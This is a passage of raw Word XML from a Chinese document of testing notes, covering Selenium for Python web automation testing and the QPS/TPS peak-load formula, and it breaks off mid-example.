        </w:rPr>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00461BB6" w:rsidRPr="00F41A4C" w:rsidRDefault="00461BB6" w:rsidP="00461BB6">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>destroy()</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00411F69" w:rsidRPr="00F41A4C" w:rsidRDefault="00411F69" w:rsidP="00ED0BCD">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="42"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> Python</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>自动化测试</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007B09E9" w:rsidRPr="00F41A4C" w:rsidRDefault="007B09E9" w:rsidP="007B09E9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="006472FD" w:rsidRPr="00F41A4C" w:rsidRDefault="00E3152D" w:rsidP="00022A5D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>使</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>用</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Python</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>进行</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Web</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>自动化测试的工具有很多，这里就向大家推荐一下我比较熟悉的</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Selenium</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E3152D" w:rsidRPr="00F41A4C" w:rsidRDefault="00E3152D" w:rsidP="00022A5D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>能与浏览器进行交互</w:t>
      </w:r>
      <w:r w:rsidR="00E25B22" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005A2BBE" w:rsidRDefault="005A2BBE" w:rsidP="00022A5D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>严格说来，</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Selenium</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>是一套完整的</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Web</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>应用程序测试系统，它包含了测试的录制（</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Selenium IDE</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>）、编写及运行（</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Selenium Remote Control</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>）和测试的并行处理（</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Selenium Grid</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>）。</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Selenium</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>的核心</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Selenium Core</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>基于</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>JsUnit</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>，完全由</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>编写，因此可运行于任何支持</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>的浏览器上。与</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>WatiN</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>相同，</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Selenium</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>也是一款同样使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Apache License 2.0</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>协议发布的开源框架</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005240A8" w:rsidRPr="00F41A4C" w:rsidRDefault="000A0EB1" w:rsidP="005240A8">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="42"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="005240A8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>QPS</w:t>
      </w:r>
      <w:r w:rsidR="005240A8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>与</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>TPS</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008327C2" w:rsidRDefault="00F23B3E" w:rsidP="00CE213D">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="F3FFEC"/>
        <w:spacing w:after="136" w:line="326" w:lineRule="atLeast"/>
        <w:ind w:left="585"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>你好，每秒查询率</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>QPS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>是对一个特定的查询服务器在规定时间内所处理流量多少的衡量标准，在因特网上，作为域名系统服务器的机器的性能经常用每秒查询率来衡量。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>原理：每天</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>80%</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>的访问集中在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>20%</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>的时间里，这</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>20%</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>时间叫做峰值时间</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>公式：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">( </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>总</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>PV</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>数</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> * 80% ) / ( </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>每天秒数</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> * 20% ) = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>峰值时间每秒请求数</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">(QPS) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>机器：峰值时间每秒</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">QPS / </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>单台机器的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">QPS = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>需要的机器</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>问：每天</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">300w PV </w:t>
      </w:r>
      <w:r>
        <w:rPr>
